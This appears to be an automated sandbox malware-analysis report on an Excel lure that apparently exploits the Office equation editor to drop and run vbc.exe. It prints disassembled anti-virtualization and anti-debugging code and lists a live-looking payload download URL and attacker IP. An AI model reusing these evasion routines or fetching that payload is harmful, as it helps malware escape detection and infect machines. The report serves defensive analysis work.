Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000329831 second address: 0000000000329831 instructions: 0x00000000 rdtsc 0x00000002 mov eax, FCDACE93h 0x00000007 sub eax, 1A63DDA3h 0x0000000c xor eax, D5EBB4F5h 0x00000011 add eax, C862BBFCh 0x00000016 cpuid 0x00000018 jmp 00007F22F08EB422h 0x0000001a pushad 0x0000001b mov dx, C148h 0x0000001f cmp dx, C148h 0x00000024 jne 00007F22F08EA77Dh 0x0000002a popad 0x0000002b popad 0x0000002c call 00007F22F08EB3E8h 0x00000031 lfence 0x00000034 mov edx, CD724B6Dh 0x00000039 xor edx, AC8852AFh 0x0000003f xor edx, A3550569h 0x00000045 xor edx, BD511CBFh 0x0000004b mov edx, dword ptr [edx] 0x0000004d lfence 0x00000050 test edx, eax 0x00000052 cmp eax, edx 0x00000054 test eax, ecx 0x00000056 ret 0x00000057 sub edx, esi 0x00000059 ret 0x0000005a add edi, edx 0x0000005c dec dword ptr [ebp+000000F8h] 0x00000062 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000069 jne 00007F22F08EB3C9h 0x0000006b test dl, FFFFFFE1h 0x0000006e call 00007F22F08EB42Bh 0x00000073 call 00007F22F08EB45Ch 0x00000078 lfence 0x0000007b mov edx, CD724B6Dh 0x00000080 xor edx, AC8852AFh 0x00000086 xor edx, A3550569h 0x0000008c xor edx, BD511CBFh 0x00000092 mov edx, dword ptr [edx] 0x00000094 lfence 0x00000097 test edx, eax 0x00000099 cmp eax, edx 0x0000009b test eax, ecx 0x0000009d ret 0x0000009e mov esi, edx 0x000000a0 pushad 0x000000a1 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832 Thread sleep time: -300000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329829 rdtsc 6_2_00329829

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329829 rdtsc 6_2_00329829
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00328C25 mov eax, dword ptr fs:[00000030h] 6_2_00328C25
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032441B mov eax, dword ptr fs:[00000030h] 6_2_0032441B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326503 mov eax, dword ptr fs:[00000030h] 6_2_00326503
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A24C mov eax, dword ptr fs:[00000030h] 6_2_0032A24C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003292EB mov eax, dword ptr fs:[00000030h] 6_2_003292EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A2D7 mov eax, dword ptr fs:[00000030h] 6_2_0032A2D7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003237A0 mov eax, dword ptr fs:[00000030h] 6_2_003237A0

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 482488 Sample: Inquiry Sheet.xlsx Startdate: 13/09/2021 Architecture: WINDOWS Score: 100 24 Found malware configuration 2->24 26 Antivirus detection for URL or domain 2->26 28 Multi AV Scanner detection for dropped file 2->28 30 11 other signatures 2->30 6 EQNEDT32.EXE 12 2->6         started        11 EXCEL.EXE 34 46 2->11         started        process3 dnsIp4 22 212.192.246.25, 49165, 80 RHC-HOSTINGGB Russian Federation 6->22 16 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 6->16 dropped 18 C:\Users\Public\vbc.exe, PE32 6->18 dropped 32 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->32 13 vbc.exe 6->13         started        20 C:\Users\user\Desktop\~$Inquiry Sheet.xlsx, data 11->20 dropped file5 signatures6 process7 signatures8 34 Multi AV Scanner detection for dropped file 13->34 36 Machine Learning detection for dropped file 13->36 38 Tries to detect virtualization through RDTSC time measurements 13->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
212.192.246.25
 unknown Russian Federation
205220 RHC-HOSTINGGB true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://212.192.246.25/excel/vbc.exe true
  • Avira URL Cloud: malware
 unknown
http://37.0.11.217/WEALTHYREM_ecI true
  • Avira URL Cloud: safe
 unknown